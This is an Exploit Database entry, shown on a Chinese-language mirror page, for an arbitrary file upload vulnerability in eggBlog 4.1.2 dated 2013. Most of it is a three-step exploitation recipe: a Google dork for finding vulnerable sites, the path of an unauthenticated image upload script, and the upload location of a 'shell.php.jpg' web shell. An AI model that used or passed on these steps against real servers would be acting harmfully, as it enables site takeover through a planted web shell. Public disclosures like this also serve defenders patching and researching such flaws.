EggBlog 4.1.2 – Arbitrary File Upload

• Exploit Database
• 117 阅读

• 作者： Pokk3rs
  日期： 2013-05-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/25126/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # Exploit Title: eggBlog Arbitrary File Upload Vulnerability # Google Dork:"powered by eggBlog.net" # Date: 28/04/2013 # Exploit Author: Pokk3rs # Vendor Homepage: http://eggblog.net/ # Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/ # Tested on: Win8 Pro x64       Expl0itation     1 - Google Dork:"powered by eggBlog.net"     2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=     3 - http://server/[path]/photos/uploads/shell.php.jpg       #